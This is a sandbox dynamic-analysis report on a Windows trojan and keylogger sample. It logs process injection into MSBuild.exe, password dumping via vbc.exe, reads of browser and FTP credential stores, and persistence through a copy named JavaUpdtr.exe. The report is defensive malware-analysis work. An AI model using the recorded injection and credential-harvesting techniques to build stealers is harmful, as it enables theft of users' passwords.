b77b82fa...2607 | Grouped Behavior
Logo
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Keylogger, Spyware, Trojan

gmmqacgpk.exe

Windows Exe (x86-32)

Created at 2019-07-22T00:24:00

...

Remarks (1/1)

(0x2000004): The operating system was rebooted during the analysis because the sample installed a startup script, task or application for persistence.

Grouped Sequential

Monitored Processes

Process Graph

Process Graph Legend
Process Overview
»
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0xa60 Analysis Target High (Elevated) gmmqacgpk.exe "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gmmqacgpk.exe" -
#2 0xb18 Child Process High (Elevated) msbuild.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe" #1
#4 0xbf8 Child Process High (Elevated) vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe -f C:\Users\5P5NRG~1\AppData\Local\Temp\IEPass.txt #2
#5 0x594 Child Process High (Elevated) vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt #2
#7 0x4e8 Autostart Medium javaupdtr.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe" -
#8 0x708 Child Process Medium msbuild.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe" #7
#9 0x718 Child Process Medium msbuild.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe" #7

Behavior Information - Grouped by Category

Process #1: gmmqacgpk.exe
340 0
»
Information Value
ID #1
File Name c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gmmqacgpk.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:26, Reason: Analysis Target
Unmonitor End Time: 00:00:36, Reason: Self Terminated
Monitor Duration 00:00:10
OS Process Information
»
Information Value
PID 0xa60
Parent PID 0x45c (c:\windows\explorer.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A64
0x A74
0x A78
0x A7C
0x A80
0x A84
0x B20
0x B24
0x B30
0x B34
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
system.drawing.ni.dll 0x747F0000 0x74977FFF Content Changed - 32-bit 0x74843870, 0x74828140 False False
...
system.drawing.ni.dll 0x747F0000 0x74977FFF Content Changed - 32-bit 0x7483BB90, 0x74839940 False False
...
system.drawing.ni.dll 0x747F0000 0x74977FFF Content Changed - 32-bit 0x7483FEDC, 0x74827478, ... False False
...
microsoft.visualbasic.ni.dll 0x73E60000 0x73FFAFFF Content Changed - 32-bit 0x73F386A0, 0x73F37A6C, ... False False
...
microsoft.visualbasic.ni.dll 0x73E60000 0x73FFAFFF Content Changed - 32-bit 0x73F8A650, 0x73E891D0, ... False False
...
microsoft.visualbasic.ni.dll 0x73E60000 0x73FFAFFF Content Changed - 32-bit 0x73F3A025, 0x73F39DF8, ... False False
...
microsoft.visualbasic.ni.dll 0x73E60000 0x73FFAFFF Content Changed - 32-bit 0x73F4FC90 False False
...
microsoft.visualbasic.ni.dll 0x73E60000 0x73FFAFFF Content Changed - 32-bit 0x73F4C0FC False False
...
microsoft.visualbasic.ni.dll 0x73E60000 0x73FFAFFF Content Changed - 32-bit 0x73F33B94, 0x73F53EB4, ... False False
...
microsoft.visualbasic.ni.dll 0x73E60000 0x73FFAFFF Content Changed - 32-bit 0x73F7F441, 0x73F4AADE, ... False False
...
system.drawing.ni.dll 0x747F0000 0x74977FFF Content Changed - 32-bit 0x7483A7F0, 0x74831FAC False False
...
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp 51 bytes MD5: 112a15fe8f0812fb5b44e44f1b5a8df2
SHA1: fa53bc2d594d4a1307176406fe4c4b63f01607ae
SHA256: fb83cd90872a11a04c5df9734833cf8e0e4adf6af25d9ded59dcbae3e77dfccf
SSDeep: 3:oNBiTktGaACIIUvJLACn:oNUTk4FC1URLNn 		False
...
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp 64 bytes MD5: 8298bd7dd49a941d4f9dee3f49df4857
SHA1: 8820f66e7123fdfae68c1a049286576c5c58910c
SHA256: 0bba49534b921bcfc1b5f71926165f357add38b22a48763d946d55e4e8ab46db
SSDeep: 3:oNBiTktG+Vh4EaKC5cEcTrkCn:oNUTk4aJaZ5cTTrkCn 		False
...
Host Behavior
File (4)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp type = file_type True 2
Fn
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp size = 51 True 1
Fn
Data
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe os_pid = 0xb18, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE True 1
Fn
Thread (3)
»
Operation Process Additional Information Success Count Logfile
Get Context c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe os_tid = 0xa64 True 1
Fn
Set Context c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe os_tid = 0xa64 True 1
Fn
Resume c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe os_tid = 0xa64 True 1
Fn
Memory (7)
»
Operation Process Additional Information Success Count Logfile
Allocate C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe address = 4194304, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 360448 True 1
Fn
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe address = 2130567176, size = 4 True 1
Fn
Data
Write C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe address = 0x400000, size = 512 True 1
Fn
Data
Write C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe address = 0x402000, size = 328704 True 1
Fn
Data
Write C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe address = 0x454000, size = 1536 True 1
Fn
Data
Write C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe address = 0x456000, size = 512 True 1
Fn
Data
Write C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe address = 0x7efde008, size = 4 True 1
Fn
Data
Module (306)
»
Operation Module Additional Information Success Count Logfile
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gmmqacgpk.exe, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 9
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 9
Fn
User (1)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
System (2)
»
Operation Additional Information Success Count Logfile
Get Info type = Operating System True 2
Fn
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
Fn
Get Environment String name = windir, result_out = C:\Windows True 1
Fn
Process #2: msbuild.exe
1040 15
»
Information Value
ID #2
File Name c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe
Command Line "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:34, Reason: Child Process
Unmonitor End Time: 00:01:16, Reason: Self Terminated
Monitor Duration 00:00:41
OS Process Information
»
Information Value
PID 0xb18
Parent PID 0xa60 (c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x B1C
0x B28
0x B2C
0x B38
0x B3C
0x B40
0x B44
0x B7C
0x B80
0x B84
0x B88
0x B90
0x B94
0x BB8
0x BBC
0x BC0
0x BC4
0x BC8
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
custommarshalers.ni.dll 0x74750000 0x74789FFF Content Changed - 32-bit 0x74770E64 False False
...
custommarshalers.ni.dll 0x74750000 0x74789FFF Content Changed - 32-bit 0x74775920 False False
...
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73B3E3B8 False False
...
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73BA5380 False False
...
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73B9C558, 0x73B3D8EC False False
...
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73BA94F0, 0x73BA01D0 False False
...
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73BA8E08, 0x73BD4B38 False False
...
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73BA2800, 0x73BD535C, ... False False
...
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73BDCDC4 False False
...
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73BD5000, 0x73BDE000, ... False False
...
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73BE9590, 0x73BA4000 False False
...
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73B9E2A0 False False
...
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73BAB320 False False
...
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73BAB000, 0x73BAAF84, ... False False
...
buffer 0x006D0000 0x006D0FFF First Execution - 32-bit 0x006D01BC, 0x006D0DD8, ... False False
...
system.configuration.ni.dll 0x73A20000 0x73B10FFF Content Changed - 32-bit 0x73A4D073 False False
...
system.configuration.ni.dll 0x73A20000 0x73B10FFF Content Changed - 32-bit 0x73A4E149 False False
...
system.xml.ni.dll 0x72480000 0x729B5FFF Content Changed - 32-bit 0x728E650B False False
...
system.configuration.ni.dll 0x73A20000 0x73B10FFF Content Changed - 32-bit 0x73A50050 False False
...
system.configuration.ni.dll 0x73A20000 0x73B10FFF Content Changed - 32-bit 0x73A51000 False False
...
system.configuration.ni.dll 0x73A20000 0x73B10FFF Content Changed - 32-bit 0x73A48650, 0x73A4A320, ... False False
...
buffer 0x000F8000 0x000F8FFF First Execution - 32-bit 0x000F85F8 False False
...
buffer 0x00332000 0x00332FFF First Execution - 32-bit 0x003324E0 False False
...
Injection Information
»
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Modify Memory #1: c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe 0xa64 address = 0x400000, size = 512 True 1
Fn
Data
Modify Memory #1: c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe 0xa64 address = 0x402000, size = 328704 True 1
Fn
Data
Modify Memory #1: c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe 0xa64 address = 0x454000, size = 1536 True 1
Fn
Data
Modify Memory #1: c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe 0xa64 address = 0x456000, size = 512 True 1
Fn
Data
Modify Memory #1: c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe 0xa64 address = 0x7efde008, size = 4 True 1
Fn
Data
Modify Control Flow #1: c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe 0xa64 os_tid = 0xb1c, address = 0x0 True 1
Fn
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gmmqacgpk.exe 692.00 KB MD5: e4117e6974363cac8b37e5e3ff5d07a6
SHA1: 74a02a421e029d24a1d2c692df28a90296d052d0
SHA256: b77b82fa96b676790b9a207d8208d90ace3a0922d5db5938c446cd22e9132607
SSDeep: 12288:3qPSBEsVqSI0TjVMB2rdet1pEpWI8c8J:8eHVqSmUr0HipF8x 		False
...
Host Behavior
COM (19)
»
Operation Class Interface Additional Information Success Count Logfile
Create WBEMLocator IWbemLocator cls_context = CLSCTX_INPROC_SERVER True 2
Fn
Create WbemDefaultPathParser IWbemPath cls_context = CLSCTX_INPROC_SERVER True 3
Fn
Create WbemDefaultPathParser IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 5
Fn
Create WBEMLocator IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Create WScript.Shell IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 6
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = \\.\root\cimv2 True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = \\.\root\cimv2 True 1
Fn
File (95)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome\User Data\Default\Login Data desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\profiles.ini desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\IEPass.txt desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 2
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\CoreFTP\sites.idx desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\FileZilla\recentservers.xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ False 1
Fn
Create Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java - True 1
Fn
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config type = file_attributes True 1
Fn
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config type = file_attributes True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config type = file_type True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config type = file_attributes True 3
Fn
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config type = file_type True 2
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp type = file_type True 2
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\ type = file_attributes False 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java type = file_attributes False 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming type = file_attributes True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData type = file_attributes True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz type = file_attributes True 1
Fn
Get Info C:\Users type = file_attributes True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gmmqacgpk.exe type = file_attributes True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome\User Data\Default\Login Data type = file_attributes True 3
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome\User Data\Default\Login Data type = file_type True 2
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\profiles.ini type = file_type True 2
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\logins.json type = file_attributes False 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Opera Software\Opera Stable\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\IEPass.txt type = file_attributes False 2
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\IEPass.txt type = file_attributes True 2
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\IEPass.txt type = file_type True 2
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Comodo\Dragon\User Data\Default\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Login Data type = file_attributes False 1
Fn
Get Info C:\Chromium\User Data\Default\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt type = file_attributes False 7
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt type = file_attributes True 3
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt type = file_type True 4
Fn
Get Info C:\ProgramData\DynDNS\Updater\config.dyndns type = file_attributes False 1
Fn
Get Info C:\Users\All Users\AppData\Roaming\FlashFXP\3quick.dat type = file_attributes False 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\.purple\accounts.xml type = file_attributes False 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ type = file_attributes False 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Ftplist.txt type = file_attributes False 1
Fn
Get Info C:\Program Files (x86)\jDownloader\config\database.script type = file_attributes False 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Explorer.txt type = file_attributes False 1
Fn
Copy C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gmmqacgpk.exe True 1
Fn
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config size = 4096, size_out = 237 True 1
Fn
Data
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config size = 4096, size_out = 559 True 1
Fn
Data
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config size = 4096, size_out = 0 True 1
Fn
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp size = 4096, size_out = 51 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp size = 4096, size_out = 0 True 1
Fn
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome\User Data\Default\Login Data size = 18432, size_out = 18432 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\profiles.ini size = 4096, size_out = 111 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\profiles.ini size = 4096, size_out = 0 True 1
Fn
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\IEPass.txt size = 4096, size_out = 389 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\IEPass.txt size = 4096, size_out = 0 True 1
Fn
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt size = 4096, size_out = 475 True 2
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt size = 4096, size_out = 0 True 2
Fn
Delete C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt - True 1
Fn
Delete C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\IEPass.txt - True 1
Fn
Registry (46)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting - True 1
Fn
